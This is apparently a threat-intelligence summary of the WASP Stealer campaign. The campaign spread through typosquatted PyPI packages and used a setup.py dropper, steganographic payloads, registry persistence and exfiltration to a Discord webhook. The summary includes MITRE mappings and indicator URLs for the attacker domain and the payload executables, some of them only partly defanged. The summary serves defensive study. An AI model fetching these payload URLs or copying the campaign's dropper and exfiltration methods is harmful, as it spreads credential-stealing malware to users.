Researchers identify the WASP threat actor behind a Python package campaign that delivers a polymorphic WASP Stealer via PyPI and uses steganography to hide its payload. The malware targets Discord accounts, wallets, and other files, exfiltrating data through a hard-coded Discord webhook while leveraging fake GitHub profiles and typosquatted packages to spread. #WASP #WASPStealer #PyPI #Discord #Steganography #Typosquatting #GitHub
Keypoints
- WASP is the threat actor behind a PyPI-based supply chain attack, using typosquatting and fake GitHub profiles to distribute WASP Stealer.
- The campaign employs polymorphic malware that hides its payload via steganography and can reboot persistently.
- The dropper is delivered through Python packaging (setup.py) and installs additional components (e.g., judyb) used for steganography.
- The attacker fetches a second-stage payload from misogywtf, which is gzip-encoded and then decoded and loaded in memory.
- Persistence is achieved by modifying the Run registry key to survive reboots, enabling silent operation.
- Data theft targets Discord accounts, passwords, crypto wallets, credit cards, and other files, exfiltrated via a hard-coded Discord webhook.
MITRE Techniques
- [T1059.006] Python – After installing the package, the setup.py script is executed. ‘After installing the package, the setup.py script is executed.’
- [T1105] Ingress Tool Transfer – The setup.py script downloads a .png image from this address and saves it in the operating system’s temp directory. ‘Next, the setup.py script downloads a .png image from this address and saves it in the operating system’s temp directory.’
- [T1027.001] Steganography – The attacker was using steganography to hide code inside packages. ‘using steganography to hide code inside packages’
- [T1140] Deobfuscate/Decode Files or Information – The juicy code in this stage is gzip encoded, so the first instruction executed is to decode it and load it. ‘The juicy code in this stage is gzip encoded, so the first instruction executed is to decode it and load it.’
- [T1547.001] Boot or Logon Autostart Execution – The code modifies the registry key ‘HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun’ so that this python code will be persistent across reboots. ‘…registry key — HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun’
- [T1195] Supply Chain Typosquatting – Typosquatting on PyPI packages. ‘uploaded Typosquatting packages combined with the Starjacking technique (stealing the stars from another project)’
- [T1036] Masquerading – Fake GitHub profiles to appear legitimate. ‘fake GitHub accounts’ and ‘stealing the profile description from popular user accounts’
- [T1041] Exfiltration Over C2 Channel – Data is sent to a hard-coded Discord webhook. ‘sends the data back to the attacker’s discord webhook which is hard coded inside’
Indicators of Compromise
- [URL] – hxxps://i.imgur[.]com/aRl53RS.png, hxxps://i.imgur.com/xbQ1J4D.png
- [Domain] – misogyny[.]wtf
- [URL] – hxxp://misogyny[.]wtf/inject/UsRjS959Rqm4sPG4
- [URL] – hxxp://misogyny.wtf:8080/, hxxp://misogyny.wtf:2020/copy
- [URL] – hxxp://misogyny[.]wtf/grab/UsRjS959Rqm4sPG4
- [URL] – hxxp://misogyny.wtf:2020/parser
- [URL] – https://cdn[.]discordapp[.]com/attachments/1039182045575925784/1039513531667726336/UPDATE.exe, https://cdn[.]discordapp[.]com/attachments/1039182045575925784/1039513532061978685/FEED.exe